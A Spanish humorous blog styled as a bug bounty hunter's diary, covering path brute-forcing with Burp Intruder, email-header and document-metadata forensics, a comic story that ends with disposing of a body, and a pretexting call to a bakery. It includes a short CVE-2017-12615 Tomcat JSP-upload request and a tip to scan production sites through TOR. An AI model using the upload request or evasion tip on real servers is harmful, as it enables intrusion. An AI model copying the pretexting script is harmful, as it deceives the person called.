Sábado, 30 de Septiembre de 2017: Como quedarte sin comer teniendo dinero

Querido diario… tengo hambre, me gruñe la panza, me duele la cabeza; creo que me voy a desmayar.

Hoy desperté y dije “¡Ahhhhh! Santo Chucho Cristo Redentor; hoy va a ser un día muuuuuy productivo para mi, voy a cambiar el mundo, voy a hacer ejercicio, voy a cocinar comida saludable, voy a buscar un empleo decente… ah.. si, hoy es un nuevo día, lleno de esperanzas y expectativas.. ala, mira…. que hasta el horóscopo dice que hoy es un día de cambio”; y pues si, todo iba bien hasta que:

Y bueno… la buena noticia es que; mi amiga Kar… bueno esto es un diario de un bug bounty hunter ilegal hay que proteger la identidad de las personas,… mi amiga Cinthya consiguió su jersey de Club de Cuervos, también la buena noticia es que mientras tooooodos estaban trabajando, aburridos es sus trabajos, pues yo… creo que fui el primero de todas las personas que conozco en ver la nueva temporada de Club de Cuervos completa; la mala noticia es que no trabajé, pero la peor de las peores noticias es que ¡no comí!.

¿Y por qué no comí?, bueno… pues primero me pasé toda la mañana viendo la serie, de pronto empezó a hacer hambre y dije “ahhhh… pues creo que es tiempo de comer”, pero el día de ayer me di cuenta que este mes debo como $8, 000 de tarjeta de crédito, ¡sólo de taxis! (vivo en un sitio en donde es imposible salir a donde sea si no es en taxi), más todo lo demás. Así que no podía usar mi tarjeta para pedir comida, vi mi cuenta de PayPal y ouuu.. tenía mágicos $0, y luego vi y ya eran las 3:09pm, lo cual en tiempo real es las 5:09pm, ósea.. ya no alcanzaba a hacer una transferencia para poder comprar alimento.

¡Diablos!, ¿cómo podía conseguir para pedir algo de comer?…. hum… ¿sería que los dioses bendecirían mis santas manos para encontrar una vulnerabilidad en algún bug bounty y poder tener dinero en mi cuenta de PayPal para pedir comida?.

Empecé a ver el listado de los diferentes bug bounties disponibles, la mayoría habían sido lanzados entre lunes a martes, así que encontrar una vulnerabilidad sencilla y rápida iba a ser complicado.

Mucha gente puede que haya leído la metodología de Jhaddix, bueno… si, funciona, tiene coherencia, y el básicamente te dice como cubrir la mayor parte de las vulnerabilidades de una aplicación web en un par de horas.. “mayoría”, porque yo creo que las vulnerabilidades más complejas de explotar que tienen que ver con la lógica de la aplicación, que generan más impacto y por ende más dinero, no las vas a encontrar; pero el puntoooo es que a partir de que publicó su metodología puedes ver a un montón de bug bounty hunters buscando los famosos “juicy bugs” como desesperados para llevarse sus $50 a $100 dlls… ¿esta mal?, obvio no… los bug bounty hunters somos la basura de la seguridad, ya hemos caído muy bajo al dedicarnos a esto, ponernos pikys por como buscas tus fallos sería un poco tonto.

En fin, la verdad es que $50 dlls eran más que suficientes para comer, pero… hum… bueno, no perdía nada con intentar un “juicy bug”, además cuando yo revisó una aplicación, no importa que el bounty ya llevé tiempo de liberado; siendo que algún día fui un consultor en seguridad informática respetable sigo todos los pasos de mi metodología y hago revisiones exhaustivas. Así que siempre empiezo lanzando algunos scripts, scanners y listas precargadas para encontrar fallos.

Una de las listas que ejecutó es para la búsqueda de archivos sensibles, por allí en ingles encontrarán esto como “information leak”, aunque incluso podría entrar como en configuration management, debido a que es el sysadmin el que debió de haberse asegurado que el entorno donde ejecuta la aplicación esta limpio… bueno, ¿qué que quiere decir todo esto?, pues nada más que encontramos un archivo que no debía de estar allí.

Hay varios tipos de archivos “sensibles” y no tan sensibles que te puedes encontrar, como por ejemplo un index.jsp que alguien haya cambiado de nombre por un index.jsp_, index.jsp.bk, index.jsp.old, etc… tú me entiendes, ¿no?; algunos de prueba como test.aspx, algunos index.html viejos, confs.php, archivos de properties, o algo así. La verdad es que son un montón de tipos, además no hay que olvidar directorios sensibles, paths comunes como un /admin/, /private/, etc, etc, etc, etc…

Yo lo que hago es que por allí… la verdad no recuerdo donde, descargue ya unas listas que incluyen un montón de listas de posibles archivos sensibles, paths comunes, archivos de configuración que varios manejadores de versiones o herramientas de QA y deployment van dejando; y lo que hago es que utilizó eso para buscarlas. Ahora, yo lo hago usando Burp Suite, perooooo, hay herramientas que dentro de sus pruebas hacen esto. Por ejemplo Nikto o Wikto, yo siempre pensando que es una herramienta muy chafa, como que nada más toma esas listas de búsqueda, y la GHDB y ¡zas! manda requests y por banner trata de identificar vunerabilidades, o por código de error… la verdad no me gusta, y si hay detrás un IPS o un WAF, olvídate, te van a cachar.. incluso algunas veces ni acaba si estas en un entorno Cloud, el balanceador te va a ir limitando las requests. Por otra parte también los escáners de aplicaciones hacen esto mismo, con listas internas… Acunetix es muy común que encuentre estos archivos; peroo.. hum.. aunque lo puedas encontrar con un escáner, de todas formas para un bug bounty vas a tener que mostrar la request manual; y la otra es que yo configuró muy tranquilos los escáners, porque casi todos los bounties están en la nube y también genera mucho ruido su uso; además de que muchos bounties como los de Bugcrowd y HackerOne están en producción… así que seguro tienes algo allí antes de la aplicación que te va a parar.

Lo que yo hago es cargar mis listas en Burp Suite.. tiene dos objetivos, uno de ellos es que es una validación “manual”, que en caso de encontrar algo lo que hago es poner como evidencia una screenshot del response donde se vea el contenido del juicy file; y la otra es que no siempre te tienes que fijar en los error codes, ósea si un 200 es un OK, y un 404 es un file not found, peroooo… en estos tiempos de los frameworks fancy para front end, te vas a encontrar muchos 3xx con redirects o 200 pero que en realidad regresan JSON’s con 1’s, o’s, trues, falses o vacíos; que a pesar de eso puedes seguir identificando por el tamaño del response.

Lo sé, lo sé.. más de un pentester acaba de suicidarse al leerme en este momento.. pero muchachos, ustedes sigan usando Hugo Boss y viviendo en ciudades llenas de tecnología, yo no puedo sentarme con un cliente a perdirle que me levante un ambiente de testing o de stage; yo encuentro fallos como sea y en donde sea, porque sino, no como; y en donde vivo no hay nada de tecnología.

La verdad que hacer esto es sencillísimo… abres tu navegador, configuras el proxy y hacer una petición a la aplicación o al path específico que quieres analizar; teóricamente si, debieses de analizar todos los paths que te encuentres en tu spydering.

Click derecho y mandas tu request al Intruder, agregas un comodín al final del path…

Y en Payloads cargas la lista de tus más common files… (ya te dije, no se de donde saque la mía, pero… bueno, si te interesa, luego te la pasó).

Aquí las demás opciones no importan, así que le das con un one shot y si quieres puedes jugar un poco con los time outs o los threads, pero en general si estas en testing o stage, pues no importa; si estas en productivo sal por TOR o ProxyChains y ya.

Bueno… que al final la cosa es que encontré un info.php.. ¿por qué razón los infophp() siempre se llaman info.php?… no entiendo, podrían llamarse como fuesen, pero siempre se llaman así. Un “juicy file” muy poco juicy.. pero lo reporté, no me tardé ni 5 minutos, y me pagaron $150 dlls; al parecer ese bounty llevaba una semana y nadie lo había reportado aun.. si, el gran Quetzatcoatl estaba de mi lado. Al fin tenía dinero. Marqué a Pizza Ring y dije.. bueno, voy a pedir la pizza de cheetos, que si no me voy a morir de la curiosidad. Transferí los $150 dlls a mi PayPal y justo en eso me llegó un correo.

Era tan simple el bug que me pidieron hacer el path verification cuanto antes. Sólo mandé un replay del request donde apareció el info.php y me pagaron $75 dlls extra.. bien, tenía $225 dlls para comer. Así que marqué de nuevo a Pizza Ring y pedí un ponche.

40 minutos después llegó el repartidor.. salí en pijama y pantuflas; y mis únicos $10 en efectivo. Le dije que no tenía dinero, que me acercase su lector de Apple Pay… “¿mi qué?”… esa fue su respuesta. Fue raro… viví dos años en un pueblo, lejos de la tecnología y las comodidades usuales de la civilización, ahora vivo en una ciudad, pero es una ciudad rara.. donde no usan tarjetas de crédito. ¡En serio!, no tarjeta, no PayPal, no Samsung Pay, no Apple Pay, no Google Pay, no Pay, Pay… dinero, en efectivo, como los cavernícolas cuando negociaban los ribeyes de triceratops con el T-Rex. Tenía $225 dlls en mi PayPal, tenía una pizza frente a mi y el pizzero se la iba a llevar porque quería un billete.

¿Es en seriooooo? </acento_cachanillo>

Y después de rogarle que me fiase la pizza, porque de todas formas nadie estaba tan menso como para pedir una pizza de cheetos, se iba a hacer dura y la tendrían que tirar, se llevó mi pizza. Son las 23:17, mi estomago gruñe, gané los $225 dlls más fáciles de mi vida, y no tengo como comprar comida. Después de todo, Quetzatcoatl no me bendijo tanto.

¡Oh!, por cierto querido diario… cada vez voy a escribir más poético en ti, porque tomé un taller de cuento mexicano en el CEART.

Pero no entendí mucho la verdad, pero no importa, porque cuando Belinda sea presidenta todo va a cambiar; llegará la tecnología a Mexicali y habrá montones de empresas de seguridad informática que busquen desesperadamente ex consultores como shoooo…

¡Diablos! D: si tengo hambre…

 

Viernes, 29 de Septiembre de 2017: Cosas que enamoran

Querido diario…

¿Qué? D: … ¿creías que hoy de nuevo te iba a contar una historia genial?… pues obvio no, ayer tuve que desaparecer a un descuartizado, ni que fuese james Bond…

Hoy me comporté como una persona normal y me la pasé haciendo documentos, contratos, planes de trabajo, terminé de ver la segunda temporada de Rick & Morty, me di cuenta que estoy endeudado en mi tarjeta de crédito, compré unos boletos para ir a ver Mi vecino Totoro con Dania Pelo Morado (en preventa y ya había muchos ocupados) y hum.. ¡oh si!.

Leí una investigación publicada por mi amigo nitr0us en donde mostró varias vulnerabilidades en diferentes aplicaciones para trading: http://blog.ioactive.com/2017/09/are-you-trading-securely-insights-into.html.

Me pareció muy interesante porque desde hace un tiempo he estado haciendo trading tanto con pesos mexicanos, dólares, euros, ETH y Bitcoins, es una gran cantidad de dinero la que se mueve por esos medios y esas vulnerabilidades; como el mismo lo dice, son cosas que ya están resuelvas en varias aplicaciones de mucho menor impacto.

Sigo planeando algo muy interesante para el 17 de Octubre en el Distrito Federal, pero no adelanto mucho porque aun no tengo mucho que adelantar. Y… bueno, he aquí una tabla de syscalls para muchas versiones de Windows: https://github.com/tinysec/windows-syscall-table

¿Queeeeeé?, te lo dije, soy un bug bounty hunter, un día salvo al mundo, al otro mató a alguien y al siguiente me quedó tirado en casa viendo series en calzoncillos con aroma a lavanda. La vida es dura.

¡Ahhhh!, bueno, ríete un poco.

A esa imagen yo la denomino: Cosas que enamoran.

Bueno.. nota final, querido diario… la realidad es que hoy estuve muy ocupado con algo que te va a encantar, nos vamos de viaje próximamente; perooooo…. aun no te puedo decir a donde ni porque 😉

Jueves, 28 de Septiembre de 2017: Como embolsar un cuerpo

Querido diario…

Disculpa si te mancho de sangre (cómo si los blogs se pudiesen manchar de sangre)… pero estoy en este momento sentado a la orilla de un río de aguas negras metiendo el cuerpo de un sujeto llamado Alonso en unas bolsas negras de basura, y metiendo algunas piedras para que se hunda y no flote… lo sé, ya te desperté la curiosidad por saber que fue lo que pasó, pero la realidad es que es una pésima historia… pero vale, que para eso estas aquí, así que te platicaré.

Bueno.. pues eran las diez de la noche, piloteaba mi nave, era mi taxi un vol… ok, no… disculpa mis malos chistes, he tenido un día muy malo; no eran las 10pm, en realidad eran como las 5pm sino me equivoco, y no iba en ninguna nave, sino caminando rumbo a la lavandería (¿sabías que en Mexicali a las lavanderías les dicen limpiadurías?… ni yo, esa palabra no existe, pero ahora lo sabes… Mexicali es como un país diferente, nada en todo México se parece a ellos); en fin, iba yo caminando cuando recibí una llamada, era hum… bueno, le vamos a llamar “Mam”… así como en James Bond, sólo que él es hombre, pero digamos que es la persona que en muchas de las historias que serán relatadas en este diario, me asignará las misiones imposibles que tendré que resolver.

Así que bien, Mam me dijo que había un problema; el asunto era que un sujeto había robado información sensible de un cuartel, y estaba intentando venderla en el mercado negro; de forma muy tonta en diferentes foros empezó a anunciar que tenía esa información, colocó algunas screenshots de las carátulas de los documentos que intentaba comercializar y pedía $70, 000 dlls por ella.

El problema no era pagar los $70, 000 dlls, las personas del cuartel no tenían problema con entregar el dinero, pero el punto es que era muy seguro que la volvería a vender, seguía teniendo acceso a otro tipo de información sensible, y sobre todo; el sujeto intentó implicar a la esposa de uno de los oficiales de más alto rango; y no sé como sea en donde tú me leas, pero en México hay cosas que son sagradas y con las que nunca te debes de meter; una de ellas es la mamá de alguien y la otra, con la vieja oficial de alguien, así que básicamente el oficial de alto rango ya lo había tomado más personal el asunto y quería ver al tipo en una bolsa… negra, de basura, descuartizado y con piedras dentro… embalado por un bug bounty hunter que no había comido desde ayer, más que una pizza fría de pollo con chorizo. Oh, por cierto, y antes de que se me pasé, ¿te gustan los cheetos Flamming Hot?, pues bueno en Pizza Ring venden una, pero la verdad no se ve muy antojable que ni a una amiga, que llamaremos Dania Pelo Colorido para ocultar su identidad, que es fan de las cosas picantes, como yo; se le antojó. Aun así creo que en algún momento terminaré pidiéndole por curiosidad.

Bueno, seguimos…

Lo primero que hice al recibir la llamada fue seguir mi ética y profesionalismo y decir:

– No, lo siento Mam, yo no hago eso.

Pero justo en ese momento me empezó a gruñir la panza e iba pasando frente a mi un autobús escolar, que son utilizados para llevar a los obreros a las maquilas. Así que recapacité y acepté la misión. Lo sé, soy una mala persona, pero en Mexicali no hay nada de que trabajar, así que hay que hacer este tipo de cosas.

Regresé a casa, y mientras iba caminando de regreso cargando mis calzoncillos limpios con un delicioso aroma a lavanda, iba pensando que hacer. No pude pensar mucho y simplemente deje que la suerte me dijese que hacer.

Llegué a casa, abrí mi poderosa computadora que se pasma con todo, pero que tiene un teclado de emoticones, lo cual es genial, porque puedo poner en Skype y Whatsapp emoticones desde mi teclado; y me dispuse a escribir un correo electrónico al tipo que estaba vendiendo la información, obviamente cuidando que todo se leyese coherente.

Hola, buen día. 

Mi nombre es Leonel David de León Juárez, hijo de una larga lista de Leoneles de León que suman siete en toda mi familia; y navegando anónimamente en Internet, me encontré con que usted tiene información que me puede ser muy valiosa. Soy un periodista, no de los buenos, de los malos; soy fan de Carmen Aristegui, soy corrupto, adoro al Peje y los domingos me robo el dinero de las limosnas en la iglesia. Así que tengo una fuerte suma de dinero que le puedo dar a cambio de que me proporcione esa información que dice tener para colocarla en un periodicazo. 

Saludos cordiales.

Bien, hasta aquí todo parecía bastante creíble, y no tardó en hacer efecto; unas horas más tarde el sospechoso se había comunicado conmigo para poder establecer una línea directa de comunicación. En pocas palabras se creyó mi historia, y empezamos a negociar. Obviamente empecé a pedir algunas evidencias de que realmente tenía la información; así que me envió un correo electrónico con un documento en PDF y una fotografía de la esposa del oficial de alto rango que estaba fondeando mi misión; todo esto desde una dirección de correo electrónico de Gmail.

Haciendo uso de mis bastos conocimientos en Análisis Forense, entre a www.google.com y escribí: como encontrar a un tipo que me envía un correo electrónico si no se donde esta. El primer resultado resultó bastante útil, una herramienta desarrollada por Google para analizar las cabeceras de los correos electrónicos que uno envía. Para ello sólo es necesario entrar aquí: https://toolbox.googleapps.com/apps/messageheader/

Abrí el correo para obtener la cabcera dando click en la flechita que hay a la derecha en la pantalla y luego seleccionando “Obtener mensaje original”.

 

Por cierto, obvio ese no es el correo del tipo sospechoso. Y toda la pornografía abierta es porque.. hum.. porque busco vulnerabilidades en sitios pornográficos.

Ya con el mensaje original lo copypasteé en la herramienta de Google:

Le de click “Analizar la cabecera anterior”:

Y bueno, en este caso si podemos ver varias direcciones que provienen de la Casa de Cultura de Baja California Norte, sin embargo en el caso de mi sospechoso que estaba usando una cuenta de Google, ¿adivina que fue lo que vi?, así es, sólo direcciones 10.x.x.x que pertenecían al mismo Google, así que primer intento fallido, no era posible encontrarlo así.

Por el poco contexto que me había dado el oficial de alto rango, el sospechaba de todo mundo, pero era más que obvio que el leak tenía que ser interno, además de que veía muy difícil que hubiesen podido extraer la información de las instalaciones, porque tenían fuertes controles de seguridad… este, si; y por eso se pueden conectar a Gmail para enviar correos, suena lógico.

En fin, Plan B, decirle que le voy a comprar los documentos, citarlo en un sitio público y cuando llegase darle unos tehucanazos, secuestrarlo y hacerle pocito hasta que confesase… sin embargo tenía un problema, el sospechoso se encontraba en Yucatán. Lo cual literalmente está al otro lado del país que yo, así que el Plan B tendría que hacerlo esperar.

Con la información que me había enviado de prueba intenté hacer una relación de la información, y recordé a un español que siempre está usando un gorrito; Recuerdo que hablaba de metadatos esto, metadatos aquello, metadatos, metadatos, meta, datos, datos, meta… entonces de pronto algo en mi interior me dijo “vendetta… ¡analiza los metadatos!, joder tío”.

Para analizar los metadatos hay montones de herramientas de hecho recuerdo que Chema Alonso había liberado una versión de su herramienta FOCA, pero más enfocada a análisis forense y que extraía la información de los metadatos de una imagen de disco duro o archivos seleccionados y los correlacionaba entre sí, pero no encontré la FOCA forense, o al menos no con un checksum que me permitiese estar seguro que no estaba infectando mi equipo. Así que decidí buscar en Kali Linux que podía utilizar, y… no encontré nada, pero me encontré una herramienta llamada ExifTool que es fácil de instalar en Kali.

vendetta@quesadillasinqueso:~$ sudo apt-get install libimage-exiftool-perl exiftool

Como todo en los Debian based, las cosas son mágicas cuando son mágicas, trágicas cuando no… para mi suerte, esto resultó mágico. Y teniendo la herramienta instalada, no hice más que meter toda la evidencia al directorio y ejecuté la herramienta con el path para analizarla:

vendetta@quesadillasinqueso:~$ exiftool /home/vendetta/UltraTopSecretPathDelSospechosoQueQuiereChantajearAlOficialDeAltoRangoConCosasRarasDeSuVieja/

Y me encontré:

Bien, encontré el nombre de la persona que originalmente hizo el documento, la herramienta y versiones del software que utilizó para crearlo. Pero eso no me era útil, esa persona era de intima confianza del oficial de alto rango, así que quedaba descartada de entre los sospechosos. Por cierto, también encontré una carita de pánico entre los metadatos… el documento estaba asustado, tanto como yo.

Las fotografias tenían algo más de información, pero realmente no muy útil, lo que más pude obtener fueron las coordenadas de donde fue tomada la foto que metí directamente en Google Maps y me apareció la dirección del cuartel. Eso lo único que me confirmó es que el sospechoso tenía que ser parte del cuartel para poder tener acceso a él, pero nada más.

Pensé y pensé… y de pronto se me ocurrió algo. Ya que el sospechoso me estaba respondiendo pensé que podría enviarle una imagen sencilla, algo como una firma en mis correos electrónicos o un cuadrito en blanco que estuviese alojado en un servidor de mi control, y que cuando él abriese el correo electrónico se hiciese una petición a la imagen; ya teniendo la petición de la imagen entraría a los logs del servidor web para verificar la IP desde donde sea hacia la HTTP request y si corría con la suerte de que la estaba haciendo desde dentro del cuartel pedirle a alguien que me ayudase a validar en el appliance que estuviese como gateway de Internet del cuartel que dirección IP interna había hecho esa request.

Subí a ti una imagen en blanco: http://bigshot.beer/blanco.png

Y literalmente copié y pegué la imagen en Gmail, ya antes había hecho este truco cuando intenté rastrear a alguien en un chat de Messenger de Facebook y funcionó, pero en esa ocasión no; resulta que para Gmail copiar una imagen y adjuntar es exactamente lo mismo, así que al momento de pegarla en el cuerpo del mensaje mi imagen se terminaba convirtiendo en una imagen con una referencia interna de Google. Intenté adjuntarla con un tag de HTML directamente en el correo y nada, esos de Google han resuelto muchas cosas, así que adiós a mi brillante plan C.

La verdad se me estaban acabando las opciones y me puse a buscar un vuelo para poder irme a Yucatán. Aunque tampoco tenía como idea de que haría allá una vez que llegase. Podía ir al cuartel y todo, pero llegando allí no tendría mucho apoyo por parte de las personas que se encargan de administrar la red del cuartel porque obvio todos son sospechosos, y el oficial de alto rango, aunque era de muy alto rango no era una persona que me pudiese prestar los accesos a las consolas. Así que tenía varios planes en mente, pero todos ellos no parecía que me pudiesen llevar a algo.

Mi Plan D era llegar directo, conectarme al gateway de salida que podría ser un router o un firewall y sniffear a ver si veía la referencia de la imagen en blanco en Google. Que por cierto, una vez que Google renderíza la imagen esta se vuelve una referencia estática, así que pueden checar el nombre gigante de la imagen en un HTTP request normal y si tienen suerte lo verán, el problema es que viaja por HTTPS, así que hum.. bueno, tal vez lo viese en un GET pero no estaba seguro.

El Plan E era que si de todas formas todo lo que iba a ver estaba cifrado, llegase a intentar conectarme a la consola del firewall; ya fuese que con mi enorme encanto convenciese a un administrador de red o que atacase a uno de los administradores de la red para que se conectase al gateway y en ese momento cachase sus contraseñas y pudiese obtener las credenciales. Ya una vez conectado ingresar tranquilamente a revisar los logs en búsqueda de las personas que hayan accedido a Gmail y poder ir reduciendo mis opciones de sospechoso.

El Plan F era llegar y hacer un ARP poisoning a todo y contra todos… ok, ese era un pésimo plan.

Pues bien, el tipo se estaba impacientando y yo me estaba quedando con pocas opciones y se me estaba revolviendo la cabeza; así que lo único que se me ocurrió fue platicar con él a través de los correos y decirle que si, que aceptaba pagarle sus $70, 000 dlls y pedirle que me asegurase que la información que me ofrecía era cierto; tal vez en el último de los casos pagaba la información le decía al oficial de alto rango que la había recuperado, lo citaba en un sitio público e íbamos al Plan B de los tehuacanazos.

Mientras buscaba mi vuelo a Yucatán pasó algo, el topo empezó a enviarme información de prueba cuando vio que le asunto iba serio y estaba dispuesto a pagar, y entre las cosas que me envió fue un PDF que yo no pude abrir, con mucha sinceridad le dije que el archivo estaba dañado, me dijo que era porque había intentando sólo enviarme la primer página a modo de prueba y salió mal, pero que me enviaba un Word para validar.

¿Momento?, ¿acaba de decir un archivo de Word?…

De nuevo pasó por mi mente Chema Alonso, sus metadatos, y una conversación que tuvimos donde le pregunté cual era el propósito de que FOCA hiciese un scouting intentando relacionar información de documentos de Office, pues bien, los metadatos; los documentos de Word, principalmente, están llenos de metadatos que permiten su recuperación en caso de falla, manejo de versiones, incluso pueden llevar hasta una síntesis de la información que contiene el documento.

Así que analicé el documento y…

Pues bueno… el análisis de los metadatos de Word no sólo me arrojó el nombre de la persona que ya conocía había creado el documento inicialmente, sino que me arrojaba el nombre de la persona que dentro del Dominio del cuartel había hecho la última modificación del documento, y para que no tuviese dudas, también me decía cuantas revisiones se habían hecho al documento. La primera en su creación/lectura inicial cuando el sospechoso la obtuvo, la segunda, hecha por un tal Alonso Ríos, que era el nombre del sospechoso, y nada más para confirmar la hora en la que lo había hecho, un minuto antes… ¡pwned!.

Pues bien, el juego había terminado para nuestro amigo Alonso, lo iban a despedir e incluso podrían fincarle algún tipo de demanda, debido a que lo que había hecho era un delito… o eso pensé.

Avisé con toda mi evidencia al oficial de alto rango, lo estaba viendo por una conversación de FaceTime y obviamente se le vio muy feliz cuando escucho el nombre; vi a través de la cámara que hizo algunos ademanes, y que otros soldados salieron corriendo, medio me preguntó como era que lo había conseguido y yo medio intenté explicar, aunque creo que no me entendió mucho; unos minutos más tarde vi a los soldados entrar con una cosa que parecía un bulto a la oficina donde estaban, escuché un gracias, recibí un SMS con un depósito en mi cuenta bancaria y se perdió la conexión.

Bueno… así es la vida, pensé. Verifiqué el saldo en mi cuenta, acomodé mis calzoncillos en el armario y salí a cenar. Fui al Hooters, donde casi siempre cenó a platicar con Betty, la mesera que atiende la barra que desde que me mudé a Mexicali conozco; y mientras estaba en comiendo unas alitas 3 mile island, Mam me envió un correo con un boleto a Yucatán.

Bueno… parece que al oficial de alto rango se le pasó un poquito la mano, y heme aquí, en la orilla de un río deshaciendome de la evidencia, y no exactamente la digital.

Le platiqué mi prestanombres Eduardo, que usualmente llamo Lalo; pero que por razones de extrema seguridad; le llamaré Joven Candia, me preguntó si no me sentía mal por haber dejado a una viuda y dos niños desamparados, dijo que no podía creer que pudiese dormir; pero la verdad es que el avión me quedé muerto. Después de pensarlo bien, el Joven Candia coincidió conmigo en que hemos pasado tiempos peores, yo le dije que si… realmente no recuerdo tiempos peores a estos, pero él además de defender redes de día y hacer análisis forenses reales; de noche es abogado, es mi abogado… entonces uno le tiene que creer a su abogado.

Hemos pasado tiempos peores, podría ser peor.

Tip: querido diario… si un día tienes que embolsar a alguien en bolsas de basura, ponle doble bolsa, porque las bolsas de basura son muy delgaditas y se rompen con facilidad 😉

Miércoles, 27 de Septiembre de 2017: ¿Soy un script kiddie old school?

Querido diario…

Porque este es un diario, y los diarios se escriben así, o al menos es lo que he visto en la televisión… y la televisión nunca miente.

Bueno… he decidido cambiar la forma en que escribo el blog, y escribir un diario… ¿por qué?, bueno, tengo varias motivaciones; la principal es que tengo mucho tiempo libre… pero también esta el que soy narcisista, egocéntrico, me gusta tener fans, que me idolatren, y bueno, si escribo algo  como nunca nadie lo ha hecho con el total descaro y cinismo que me caracterizan, pues va a ser un hit.

Pero también hay otra motivación, y es que desde hace poco que me reintegre a la que podríamos denominar “el mundo de la seguridá”, me he dado cuenta que la gente ha cambiado, tengo amigos que sólo viven para buscar un fallo y venderlo de la forma más tonta, los que lo único que quieren es acumular certificaciones, que sueñan con un puesto directivo, o que simplemente quieren dinero y más dinero; aunque siguen mostrando como analizar un disco duro desde hace 10 años (si, si… lo decía por el CSI de las computadoras). Así que desde ahora he modificado la forma en que hago las entradas del blog para mostrar un poco de la verdadera pasión que existía en el hacking, el placer de meterte donde no debes, de hacer las cosas que nadie más puede, robar, hurtar, chamaquear, chantajear.. simplemente por diversión y ver como la gente se vuelve loca; y de vez en cuando hacer una buena acción y dedicarte a hacer investigación real, mejorar el mundo y todas esas cosas que se leen muy bonitas cuando das alguna entrevista. Y aprovechando que desde hace algún tiempo me he dedicado a escribir, pues vale… que se me ocurrió que sería bueno escribir el “Diario de un bug bounty hunter”.

¡Ahhh! cierto, ¿qué es eso?, bueno, pues un bug bounty hunter soy sho… sensishito y carishmático. Hace como año y medio; tras básicamente hacer un script para proponerme para cuanto empleo encontraba, rechazar a las más grandes empresas de seguridad del mundo en muchos países y no encontrar forma; me mudé a Mexicali, un desierto al norte del país, y al no tener empleo seguí los sabios consejos de un amigo llamado Leonel, que denominaremos Leonel; y me registré en Synack. Empecé encontrando vulnerabilidades principalmente en aplicaciones Web, he tenido algunas participaciones en pruebas de penetración y reversing; a pesar de lo que diga el Sweedn Ninja” para mi ser un bug bounty hunter es lo peor; nada comparado con la magia de ver cada quincena tu cuenta llena de dinero, con un buen sueldo, ser considerado importante, relevante y valioso y que la gente te trate bien.

Pero en Mexicali no se puede hacer eso, y por ciertas razones personales debo de vivir aquí, así que después de haber pasado una extraña carrera en la que me convertí en montacarguista, mesero, barman, barista e ingeniero de QA.. un día el mundo se me ilumino, una amiga llamado Caro, que denominaremos Caro, me dio un sape y tras algunos golpes de suerte, creo que el mundo me cambio un 7 de Noviembre, el día en que reporte mi primer fallo de nivel alto, tipo business logic y me pagaron varios miles de dólares por eso.. lo cual para mi fue un milagro, comí ese día carne.

A partir de eso cambio mi forma de ver la vida del bug bounty hunter… deje de irme por los “juicy bugs” y me empecé a enfocar en los que si dejan, empecé a portarme mal con la gente que en realidad no eran mis compañeros, sino mi competencia. Y empecé a desarollar mi propia metodología para encontrar fallos de forma efectiva y con un alto coste.

Aun ejecutó algunos escaneos comunes para buscar vulnerabilidades como XSS, SQLi, CSRF, etc… uso mucho Acunetix, N-Stalker, cuando estoy en los pentest uso Nmap, Nessus… pero un bug bounty hunter tiene que pegar donde más duela; así que tengo que pasar muchas horas intentando el funcionamiento lógico y las reglas de negocio para poder encontrar un fallo que de verdad valga la pena.

Así que bueno, básicamente esto es el blog y día a día escribiré algo muy descriptivo donde cínicamente expliqué como hacer muchas cosas que la gente no debiese de saber como se hacen y muchos se enojarán que lo haga, porque o evidenciaré lo sencillo que son sus trabajos o haré que la gente pueda simplemente ir siguiendo unas instrucciones y causando daños por allí. Pero, sinceramente, si me han conocido de muchos años atrás, pues básicamente no importa… soy vendetta 😉 yo hago lo que yo quiero, cuando yo quiero y como yo quiero B\

(¡ah! si, esto tiene que ser en español, porque mi ingles es pésimo, lo cual es malo porque estaría bueno que fuese en inglés, pero no se puede todo en la vida).

PoC CVE-2017-12615

Hum… I don’t know, an script using a lot of ranges on Dreamhosts, Bluehosts, OVH, Rackspace… ouuu yep! the life is sad.


PUT /tumamamemima.jsp/
Host: www.quierounhot-cacke.com:80
Connection: close
Content-Length: 85

<% out.write(”

[+] JSP upload successfully.

“); %>

 

Please, help us!

Yesterday Mexico City suffered a terrible earthquake, there a lot of people trapped into the buildings, explosions, there are a lot of zones without energy, water, and other services.

There are some accounts where you can help, I donated to “Los topos”, a team created in 1985.  You can support where you prefer, but help.

Los Topos Mexicanos
Santander 92000709294
CLABE 014180920007092942
Paypal: donativos@brigada-rescate-topos.org
www.topos.mx

I will donate all my earnings derived from the bug bounties this month. We need your support, please if you’re a bug bounty hunter, donate a part of your bounties to help my city. All the bad persons, like us, have at least one thing in our hearts that motivate us to offer everything in the world. Mexico City is one of mine.

The bread attack

One of the most valuable skills in the hacking world is the social engineering… in simple words is the ability to deceive persons, or as I say “chamaquear”, well, here is the story.

(Dialogues are in spanish, because is so complex translate them to english)

I have a friend who loves the bread of dead, this is a bread of dead:

This bread is cooked on October and November for the Day of the death, one of the most important dates at Mexico. But some places start to sell the bread on September.

We live at Mexicali, but I’m from Mexico City, and in my city bakeries are more traditionals, and there are bakeries which create the bests breads of the dead. But, due to these breads are so special, the bakeries just sell them from October 290th to November 3th… so, in September, how can I get some breads?… hum..

Well.. here is the story:

- Hola
- Si, Rosetta, buenas tardes
- Que tal, llamo porque quiero preguntar si ya tienen pan de muerto. He escuchado que es muy bueno el suyo porque esta hecho con romero
- Si, nuestra cocina esta premiada entre las 15 mejores del mundo; sin embargo lamento decirle que únicamente vendemos pan de muerto del día 29 de Octubre hasta agotar existencias
- Hum.. entiendo... ¿hay forma de que usted me pueda hacer un pedido especial?
- No creo realmente, a menos que fuese un volumen muy grande
- Hum.. entiendo.. mire, deje me presento, me llamo Judas Gerardo, y básicamente estoy de viaje en la ciudad porque tengo un restaurante en Mexicali, y bueno, nosotros no tenemos comida muy tradicional, así que mi foco en llevar la comida más tradicional del país al norte para que sea conocida. Y para día de muertos tengo planeado llevar pan de muerto de las panaderías más tradicionales, porque allá hace tanta falta que incluso la gente se atreve a comer pan de súper mercado
- Oh Dios
- Exacto, entonces estoy iniciando este nuevo proyecto, y bueno encontré que Rosetta vendé el pan de muerto calificado en 2016, y me gustaría llevar unas muestras a mis socios en Mexicali para que lo prueben y en caso de que les agrede hace un pedido mucho mayor.
- ¿Ha visto otras opciones?
- Tengo que ser sincero, si; estoy evaluando varias panaderías de las 10 mejor calificadas, por ahora llevo dos Sucreicacoa y la Pilarika; no depende únicamente de mi elegir el que más nos guste, pero bueno al fina mi intención que llevar los mejores sabores del país hacia el norte. 
- Es un proyecto muy ambicioso, y dígame ¿cuantas muestras necesita? 
